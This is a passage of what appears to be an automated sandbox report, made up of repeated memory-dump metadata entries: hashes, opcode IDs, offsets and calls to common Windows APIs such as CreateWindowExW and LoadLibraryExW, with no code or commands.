                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ec1fb29090c0eb497cccd3fa46481543f81b9f68ff6067e927eacdbd78eed0d7
                        • Instruction ID: 49c105a8e1cfabf3b94cf34a34df3a4fbb6c913832700b87d27f7aa0ec5d5c20
                        • Opcode Fuzzy Hash: ec1fb29090c0eb497cccd3fa46481543f81b9f68ff6067e927eacdbd78eed0d7
                        • Instruction Fuzzy Hash: 76E04F39610018DFCB00DF54E8889ADBB71FF84311F104056E901A7361C7309955CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a0c69d97c7051fb0ac25969e4ddb72438f5de9538eea6b10613dbf74b89de2b3
                        • Instruction ID: 7561105c9b8835e03718204407373a3ec39e5fc8c5b67333ad590109eb77e8a4
                        • Opcode Fuzzy Hash: a0c69d97c7051fb0ac25969e4ddb72438f5de9538eea6b10613dbf74b89de2b3
                        • Instruction Fuzzy Hash: 11D0C92100D3C04FCB079B24DD695813FB1BE5314035A55C6C0808B5A7C22458CADF61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ada73dc44972f4321f8e46496570a4d7caa1c37be45049854a8e3430faee6037
                        • Instruction ID: 69cb03572299623a504afacdc40f617bc470a2f9081a3c33f64300b3234bcf97
                        • Opcode Fuzzy Hash: ada73dc44972f4321f8e46496570a4d7caa1c37be45049854a8e3430faee6037
                        • Instruction Fuzzy Hash: BFD012B1508344DFC301DB68E5588253BB4DF0761174180D6F808CB172D665EC149715
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bbf9308e65f49850baae2ffd31ef990ce531c34d31b4d045a5f20e5f2b5f5a66
                        • Instruction ID: 057231c999417d359e0eed661a8a40fcf26c917f9783c2457d31a91db813ee64
                        • Opcode Fuzzy Hash: bbf9308e65f49850baae2ffd31ef990ce531c34d31b4d045a5f20e5f2b5f5a66
                        • Instruction Fuzzy Hash: 19B01233784510874C05214E700446EE356E7D007B3100463E32ACC6448E524C530584
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 79a13f34584defdca235b799d1b828a2c8c31dd1e8bba79713e0f379b1fe5d5a
                        • Instruction ID: 3500fcb77b3068117070a2755b6df40992440358c719d221bb354a181ae4356b
                        • Opcode Fuzzy Hash: 79a13f34584defdca235b799d1b828a2c8c31dd1e8bba79713e0f379b1fe5d5a
                        • Instruction Fuzzy Hash: 22B092311502088F83009B68E548C0137A8AB08A143110090E1088B232C621F8008A51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Executed Functions

                        APIs
                        • GetModuleHandleW.KERNEL32(00000000), ref: 0145962E
                        Memory Dump Source
                        • Source File: 00000012.00000002.483535165.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0145FD0A
                        Memory Dump Source
                        • Source File: 00000012.00000002.483535165.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0145FD0A
                        Memory Dump Source
                        • Source File: 00000012.00000002.483535165.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: dc5d5525a70e080d60e35d6bf9f2e5e8c78c3374f0011c0bd04cf9c2150cf76b
                        • Instruction ID: eecf26e606a0cd473f0c1689656f7e79eba9996b674727f70fb829381b6a6e27
                        • Opcode Fuzzy Hash: dc5d5525a70e080d60e35d6bf9f2e5e8c78c3374f0011c0bd04cf9c2150cf76b
                        • Instruction Fuzzy Hash: 735110B1C04249AFDF15CFA9C880ADEBFB1FF48314F24816AE919AB221D7719849CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0145FD0A
                        Memory Dump Source
                        • Source File: 00000012.00000002.483535165.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: 6874827ce3d59ebd127b1a11598c47f9976910e89e2224527f03ee67f4999f0d
                        • Instruction ID: 3667293adef346650e967d54f93ae36d59891fd91b8288bf16097aadb1bbecd1
                        • Opcode Fuzzy Hash: 6874827ce3d59ebd127b1a11598c47f9976910e89e2224527f03ee67f4999f0d
                        • Instruction Fuzzy Hash: 5451D1B1D00309DFDB14CF99D884ADEBBB5FF48314F64812AE819AB221D7709849CF91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0145BCC6,?,?,?,?,?), ref: 0145BD87
                        Memory Dump Source
                        • Source File: 00000012.00000002.483535165.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: d13e71c4098b06d089503d8c72f5bdcd670832c684e4d27e0890aefff3f1f5f6
                        • Instruction ID: 476bad451f863ab4b77f442ee8c6b82e50909cb2a371064c8d403969c9069441
                        • Opcode Fuzzy Hash: d13e71c4098b06d089503d8c72f5bdcd670832c684e4d27e0890aefff3f1f5f6
                        • Instruction Fuzzy Hash: DF21E5B5900208EFDB10DFAAD884AEEBBF5EB48324F14841AE954B3311D374A945CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0145BCC6,?,?,?,?,?), ref: 0145BD87
                        Memory Dump Source
                        • Source File: 00000012.00000002.483535165.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 747642ee4d5f6945e23b5c1643710342b73a2c067644cce4e2a139c7fd60d619
                        • Instruction ID: 4846a708e4a76be86ab418c281094684de57fc671c4502ecdda67940b9c68027
                        • Opcode Fuzzy Hash: 747642ee4d5f6945e23b5c1643710342b73a2c067644cce4e2a139c7fd60d619
                        • Instruction Fuzzy Hash: FC21E3B59002589FDB10CFA9D584AEEFBF4FB48324F15841AE954B7311C378A944CF61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,014596A9,00000800,00000000,00000000), ref: 014598BA
                        Memory Dump Source
                        • Source File: 00000012.00000002.483535165.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 75f45f687ab05007c5528d7c507d131238d302fba1c93a9a01537eba2656c9d4
                        • Instruction ID: 7dd815eda64bedefa533fcb7b8e1a526d5e42de7c413ae575f3b47f833973088
                        • Opcode Fuzzy Hash: 75f45f687ab05007c5528d7c507d131238d302fba1c93a9a01537eba2656c9d4
                        • Instruction Fuzzy Hash: E811F2B6900209DBDB10DF9AC484BDEFBF4EB48324F14842AE915B7710C375A945CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,014596A9,00000800,00000000,00000000), ref: 014598BA
                        Memory Dump Source
                        • Source File: 00000012.00000002.483535165.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 4304c3b01946b2db26e5ad96750b86430f8e1d38f7a56aedaa095c65215af8f3
                        • Instruction ID: 6eb0a38deda6c9d788a6dc06f3c0691ef44224d3baebe99105164a8779a405b1
                        • Opcode Fuzzy Hash: 4304c3b01946b2db26e5ad96750b86430f8e1d38f7a56aedaa095c65215af8f3
                        • Instruction Fuzzy Hash: AF11F2B6800209DBDB10CF9AC444ADEFBF4EB88324F14842AE919A7710C379A545CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • GetModuleHandleW.KERNEL32(00000000), ref: 0145962E
                        Memory Dump Source
                        • Source File: 00000012.00000002.483535165.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 6f46485cbdbfac8a494703e9627e819cf8a3f920beafc3414c0b2db7c7c6cabd
                        • Instruction ID: efe113fc6645d98589ea3bd04aaf664962a406f2dfd822c77fa156b0e03b1a6e
                        • Opcode Fuzzy Hash: 6f46485cbdbfac8a494703e9627e819cf8a3f920beafc3414c0b2db7c7c6cabd
                        • Instruction Fuzzy Hash: E411E0B5C006498FDB20DF9AD444BDEFBF4EB88228F14841AD829B7710D375A549CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0145FE28,?,?,?,?), ref: 0145FE9D
                        Memory Dump Source
                        • Source File: 00000012.00000002.483535165.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false
                        Similarity
                        • API ID: LongWindow
                        • String ID:
                        • API String ID: 1378638983-0
                        • Opcode ID: 244db9b985106703905de532f6723f7ed5188afcd141f48e191ef5f9b1b92f69
                        • Instruction ID: 92272ee06239eba13f2139d414017f1745ff33a9d0b140d9a8b5db9504d8bb88
                        • Opcode Fuzzy Hash: 244db9b985106703905de532f6723f7ed5188afcd141f48e191ef5f9b1b92f69
                        • Instruction Fuzzy Hash: AB1133B58002098FDB20DF9AD588BDFBBF8EB48324F10841AE915B3301C374A944CFA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0145FE28,?,?,?,?), ref: 0145FE9D
                        Memory Dump Source
                        • Source File: 00000012.00000002.483535165.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false
                        Similarity
                        • API ID: LongWindow
                        • String ID:
                        • API String ID: 1378638983-0
                        • Opcode ID: 2003a55cb0bf59e66f8a98aec8b35c3399243fef90db9ae7ca655a56a77035a2
                        • Instruction ID: cdb910ccaf88302224cfa68610dcaeac9e15e578beb3eb0c8aeed455d7f160ad
                        • Opcode Fuzzy Hash: 2003a55cb0bf59e66f8a98aec8b35c3399243fef90db9ae7ca655a56a77035a2
                        • Instruction Fuzzy Hash: 791103B58002099FDB10DF9AD585BDEBBF8EB48324F10841AE915B3711C374A944CFA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID: h?l
                        • API String ID: 0-593827334
                        • Opcode ID: 2c1352437f333d09637f54959aeec0e1e930bba4abb15a8012299bcaecdd3098
                        • Instruction ID: beeb54fb6e623f986730434292bea392b07b7cea778223b7497b8a68ce5292c8
                        • Opcode Fuzzy Hash: 2c1352437f333d09637f54959aeec0e1e930bba4abb15a8012299bcaecdd3098
                        • Instruction Fuzzy Hash: 3F21D331B10111CFC744DF68D894969B7B5FF89224B2585AAD519EB7A2DB30EC0ACB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID: d-l
                        • API String ID: 0-1317474975
                        • Opcode ID: 6d2aec2ba4047d75339d0007bfbdd9fa9fe3b0edc3c3f9e639dfb27eea81bc78
                        • Instruction ID: de650db8385f6e92398c471e017c4ef330508400429fdb2c1af4d77cc92426ed
                        • Opcode Fuzzy Hash: 6d2aec2ba4047d75339d0007bfbdd9fa9fe3b0edc3c3f9e639dfb27eea81bc78
                        • Instruction Fuzzy Hash: B0219A70E142088FDB88EFA5C484BED7BF2BB88214F6484A9D401BB790DB759D45CFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID: 3<
                        • API String ID: 0-1060474155
                        • Opcode ID: abef28135bbfaa59287063548da0c47aeeb420a5edeede8c0028a54d285d1b7a
                        • Instruction ID: a571c373f54afc461f4860016c0e043101d9f74bfffe7e7de543d608e218c09c
                        • Opcode Fuzzy Hash: abef28135bbfaa59287063548da0c47aeeb420a5edeede8c0028a54d285d1b7a
                        • Instruction Fuzzy Hash: 6BE04F71104B405BC391DB34E816746BFE29B41228F4989AE949A8B743E7659806CBC4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        • Instruction Fuzzy Hash: 44217331E0420ADFCB54EFA9C8506DEF7B5FF89300F11862AE14AB7640DB35A945CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: de83ecc43c1bb007547eede1a0a2a8c533f14aab548fb5bfc7d6ab8decd1d2ab
                        • Instruction ID: 08c6ab0189c5996cfe7b2d26f08a6c4462eae5d357a9cfde39c2d937131c6ffa
                        • Opcode Fuzzy Hash: de83ecc43c1bb007547eede1a0a2a8c533f14aab548fb5bfc7d6ab8decd1d2ab
                        • Instruction Fuzzy Hash: 3811B1317001209F9758FB68D85097EB3ABFFC86143148429E506EB791CF36EC06CBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5f241eb9db19b23c932fc70494826da107dd54d9edab959295525585f38de86c
                        • Instruction ID: b308ec3e9b94ee7924b9dec4602e46998026f3df4d286fbd8ac40fee57582f51
                        • Opcode Fuzzy Hash: 5f241eb9db19b23c932fc70494826da107dd54d9edab959295525585f38de86c
                        • Instruction Fuzzy Hash: 6F212871D04309DFDB94DF61D0805AEBBB2FF88354F20896AE416AB641E732A946CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 800cc3543c9acada7474720d2666061b31d4ea7886cdf5448276a500045eceec
                        • Instruction ID: 683489901f6dae68bc3510241f31a66489f8117117e0d284430475e796508994
                        • Opcode Fuzzy Hash: 800cc3543c9acada7474720d2666061b31d4ea7886cdf5448276a500045eceec
                        • Instruction Fuzzy Hash: 2531EA35A001059FDB44DBA8C580EEDBBF2FF88224F1A4594EA05AB726D736EC41CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 912769475b8bc148c415a63931afa9f388393d84c2fcf8d7eafe017c5c2cd5ab
                        • Instruction ID: 9a5ec4ed647782cfca3423fcab78967377ee33d6be5064826bd76d9fadb4f3f6
                        • Opcode Fuzzy Hash: 912769475b8bc148c415a63931afa9f388393d84c2fcf8d7eafe017c5c2cd5ab
                        • Instruction Fuzzy Hash: 9F219630A04214CFDB96EBE5C4487A9BBE1BF85A04F14447AD449EBA61DF729842CBD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8b46446a6dd447ec4164ad540e7159bffa1115328e989c0922d8903a89de2415
                        • Instruction ID: 54363dd03a9029ab1853c12b6412210089efc7e086fc34bfc6ecada96c193aaf
                        • Opcode Fuzzy Hash: 8b46446a6dd447ec4164ad540e7159bffa1115328e989c0922d8903a89de2415
                        • Instruction Fuzzy Hash: 09113436500119EFCF029F80DC08DA9BFB2FF09320B0A8494F605AB072CB36D566EB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8445b95ddf155c554889faabbeb9afb191624b6dd6e47e4e818602b161cb481a
                        • Instruction ID: d0176a587cc293ae3c1521956224e1735e9ab3b3d3541c44b31f5eccc8d284b6
                        • Opcode Fuzzy Hash: 8445b95ddf155c554889faabbeb9afb191624b6dd6e47e4e818602b161cb481a
                        • Instruction Fuzzy Hash: B4119330A04210CFDB95EBE9C4447ADBBE1BF88A04F148479D04AEBB60DF729842CBD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7b33b003a3ed9c5f8b736432113a3ad0d24b2441af66e15e00039404d973a7b2
                        • Instruction ID: 11aab16310742e2054350de2ad34f9d881e5cf6e6608d3ee0f4e54dc6f1815df
                        • Opcode Fuzzy Hash: 7b33b003a3ed9c5f8b736432113a3ad0d24b2441af66e15e00039404d973a7b2
                        • Instruction Fuzzy Hash: 4C21AEB1D00209CFDB90EF69C8497AEBBF0BF48314F114459D454E7652E7389605CF61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e1dcc15861bc707b0b172839d0b0b488362f2821c343c60b3a91c9ed7fd1851b
                        • Instruction ID: 3597bb18fb83380fb1b6c67b6ff2676cc35fff05416a73ca844a12e77e42745a
                        • Opcode Fuzzy Hash: e1dcc15861bc707b0b172839d0b0b488362f2821c343c60b3a91c9ed7fd1851b
                        • Instruction Fuzzy Hash: 4D119D703086008FD758BB28D05013E72A6EBD12187948C6DE11BABBC0DF72AC46CB96
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9b1989a4d65acbb21b308aa4755e2f0335d47a55e81099e81760f8458e731525
                        • Instruction ID: 0ea3b5120f0a285d69ba7881c80a3aa50a350395ca2c209ae4e0e4e83f2d284c
                        • Opcode Fuzzy Hash: 9b1989a4d65acbb21b308aa4755e2f0335d47a55e81099e81760f8458e731525
                        • Instruction Fuzzy Hash: A2118234704A02AFD774EA55C880D2AF3AAFFD8254B54C51AD45A97F94CB71BC03CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 00a46bda0813c200394dc75ada5087104fbddbe6cd39e4ee9a55526a8946c0ea
                        • Instruction ID: 0c1a93f40e3bc277753b1e0d6a9d8397d2fae8ea9d085c688f3b0187120b9df9
                        • Opcode Fuzzy Hash: 00a46bda0813c200394dc75ada5087104fbddbe6cd39e4ee9a55526a8946c0ea
                        • Instruction Fuzzy Hash: 68119030E0434ACEDB54EBB898006EFBBF5BF9A200F10866AD459E7641EB349951C792
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: db2a685dacfa437bd7f36fd0dff69c9c0b9607ce20eaed244f6d06182c971d72
                        • Instruction ID: 3d4308d56cb46f44106aab12b23d6e31c15af87425d2d18bfa5a55ce0a705511
                        • Opcode Fuzzy Hash: db2a685dacfa437bd7f36fd0dff69c9c0b9607ce20eaed244f6d06182c971d72
                        • Instruction Fuzzy Hash: C911E336500119EFCF469F80EC08CA9BFB2FF49311B068495F605AB032CB32D566EB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 46684405ab60fa8af3da6e0f2b4e6a3e352dd94884b419d74f46799cde67efa0
                        • Instruction ID: e51b12a117c8bbc80cb153ad6eaed15db54d31fbeb3dd48a7d48ba0f9a7c60a9
                        • Opcode Fuzzy Hash: 46684405ab60fa8af3da6e0f2b4e6a3e352dd94884b419d74f46799cde67efa0
                        • Instruction Fuzzy Hash: 4C11BF30B0824ACFEB65AB64C4143FEBBF2BB94318F14486EC90277B80CBB55855CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fe81219007faf2b8a28e4e31c30697deb346cb441a8f04618d9091b558978975
                        • Instruction ID: 05918d493ac47d1e76bf517fa79e017d81b876989678d5a897c63eec94728841
                        • Opcode Fuzzy Hash: fe81219007faf2b8a28e4e31c30697deb346cb441a8f04618d9091b558978975
                        • Instruction Fuzzy Hash: 6F110C31A14209DFDFA5BA65C4143FE76B5FB88354F148429E502B7A40EFB54C41CBD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f4c921560d03247311108e6035832a65e7addb8fc88f5f7884e49dc49dc0fa3f
                        • Instruction ID: 40405eb5df678f0b8c8f300989371c3ee676e1677cd6256d68cd414ae160a04b
                        • Opcode Fuzzy Hash: f4c921560d03247311108e6035832a65e7addb8fc88f5f7884e49dc49dc0fa3f
                        • Instruction Fuzzy Hash: B3118230A083C6CFE799BB70D4197267BE1FB42204F04486BD956A7A81DB79C880CFC1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 56aa16b61ccd948d4d6cc77b6dfefa40adc036f3120bf7e0a37e4ffc56aa77b9
                        • Instruction ID: b52c0fd29f652be408617abfc2ba60003af6ada670b70fe94f2c6c473889ddf0
                        • Opcode Fuzzy Hash: 56aa16b61ccd948d4d6cc77b6dfefa40adc036f3120bf7e0a37e4ffc56aa77b9
                        • Instruction Fuzzy Hash: 4C1123707803509FE369EF24D0156267BF2EB05214B4049A9E486DB791CB39AC85CFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a14c89fbe341aeba33522e81e959166cb39aa1ccdd1dcb71d9a764ac29cbbd59
                        • Instruction ID: cee128593c45403aa021c70c5d48163aa30944f1dc688efb4d63dbe2ab41f858
                        • Opcode Fuzzy Hash: a14c89fbe341aeba33522e81e959166cb39aa1ccdd1dcb71d9a764ac29cbbd59
                        • Instruction Fuzzy Hash: 91019230A04292CFF798BB64D10936677D2FB41214F00852AE91667A90DB79D880CFC1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b8edc8ab392745822bd60305ba0c64781c9a5dbb36df1f8443a0a13e12fcdaa8
                        • Instruction ID: 38b6a66a95d263595ad8d9dadeb75f48c946a942172898da60e798bd9e23d5b7
                        • Opcode Fuzzy Hash: b8edc8ab392745822bd60305ba0c64781c9a5dbb36df1f8443a0a13e12fcdaa8
                        • Instruction Fuzzy Hash: 010126317102609FD7157B79A5099AB7AD9FF88610340883EF50BE7300DE358C05C7D0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7b2974355f31e2d25604b8d4f1d5b18ad92721f3a80b166ec6163c3660651fda
                        • Instruction ID: 88d304d0ce6cb12d60c7d0fe241bcee8446ea7f6a62eb12d8d691bec0537ad22
                        • Opcode Fuzzy Hash: 7b2974355f31e2d25604b8d4f1d5b18ad92721f3a80b166ec6163c3660651fda
                        • Instruction Fuzzy Hash: 2901DF30E143068ED741FA7988005AABBB2EFC2210F00866AE545AB550EF349885C7C2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3f61dc542668a3e712964114ea4ad89f296f7b61c8e972353b532b4311ff0025
                        • Instruction ID: 56b9dc7121f881c959b6a06d0f98628734d6fc0184515ffeb3e7137d188c76ca
                        • Opcode Fuzzy Hash: 3f61dc542668a3e712964114ea4ad89f296f7b61c8e972353b532b4311ff0025
                        • Instruction Fuzzy Hash: 80F06231710250AF97147BBAA90986B7ADEEB88525350583DF90BE7740EE359C0187E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7a87d5743ce748d21188a97ba4c50719b7f6555ca1d79c227ac2d104189aa931
                        • Instruction ID: 0ef0487df582f3b3aa3d23286104e2e332d918fc501c185ac073ce006cfdef75
                        • Opcode Fuzzy Hash: 7a87d5743ce748d21188a97ba4c50719b7f6555ca1d79c227ac2d104189aa931
                        • Instruction Fuzzy Hash: 2E016D31E14647CEEB64EB74D4043A9B7B1BF81204F108A5AE505A7951EB3499C4CB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c89dd98e6bedb8ff5ea4114032fb3828ed12a16c736c42824bee7ae33e3937b2
                        • Instruction ID: 5ff95f29eaee81128452827d21ec603bc21aee355abdca87fc5c261d3ae1c15b
                        • Opcode Fuzzy Hash: c89dd98e6bedb8ff5ea4114032fb3828ed12a16c736c42824bee7ae33e3937b2
                        • Instruction Fuzzy Hash: D8F08131B002099FDF58AA6484147EE7AB6EB8C750F144429E102B7680DEB68D41CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 284d40731765ca8fc97a33618de089b05ee00d82eb4746211352afea1a279b69
                        • Instruction ID: 43207e84fadd86b6fbad39de8e3b199a56ff1f468759f06ea2a6528b424ec965
                        • Opcode Fuzzy Hash: 284d40731765ca8fc97a33618de089b05ee00d82eb4746211352afea1a279b69
